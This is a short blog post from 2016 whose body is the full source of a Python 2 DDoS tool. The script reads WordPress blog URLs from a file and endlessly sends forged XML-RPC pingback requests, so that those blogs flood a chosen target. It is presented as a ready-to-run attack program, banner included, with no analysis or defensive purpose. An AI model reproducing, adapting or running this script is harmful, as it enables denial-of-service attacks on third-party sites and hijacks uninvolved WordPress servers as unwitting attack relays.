Sunday, March 6, 2016

Source ddos attack |python|

                          Source ddos attack  |python|

# Embedded file name: ddos.py
import sys
import socket
import threading
import time
import os
Lock = threading.Lock()

def main():
    try:
        in_file = open('list.txt', 'r')
    except:
        raw_input('You need a list.txt file to work')
        sys.exit(0)

    os.system('title ...:: DDoS ATTACK BY AO ::... ')
    print '\t*********************************************??**********************'
    print '\t***6996****9669*****00000000***333333********?*****00000000**********'
    print '\t***69*96***96*69****00****00***00***********00*****00****00**********'
    print '\t***69**96**96**69***00****00****00********00*00****00****00**********'
    print '\t***69***96*96***69**00****00*****00******0000000***00****00**********'
    print '\t***69**96**96**69***00****00******00****00*****00**00****00**********'
    print '\t***69*96***96*69****00****00*******00**00*******00*00****00**********'
    print '\t***6996****9669*****00000000***333333**************00000000**********'
    print '\t*********************************************************************'
    num_thread = input('Number Of Bot: ')
    url = raw_input('Target: ')
    for i in range(num_thread):
        try:
            in_line = in_file.readline()
            Thread1(url, i + 1, in_line).start()
            in_line = in_line[:-1]
        except:
            pass

    time.sleep(3)


class Thread1(threading.Thread):

    def __init__(self, url, number, blog):
        self.url = url
        self.number = number
        self.blog = blog
        threading.Thread.__init__(self)

    def run(self):
        Lock.acquire()
        print 'Starting thread #%s' % self.number
        Lock.release()
        function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>" % (self.url, self.blog)
        request_lenght = len(function_pingback)
        try:
            self.blog_cleaned = self.blog.split('?p=')[0]
            self.blog_cleaned1 = self.blog_cleaned.split('http://')[1].split('/')[0]
        except:
            sys.exit(0)

        request = 'POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n' % (self.blog_cleaned,
         self.blog_cleaned1,
         request_lenght,
         self.url,
         self.blog)
        while True:
            time.sleep(3)
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
                s.connect((self.blog_cleaned1, 80))
                s.send(request)
                print 'Bot %s | Victim %s' % (self.number, self.blog_cleaned1)
            except:
                ok = 0


main()



E

No comments:

Post a Comment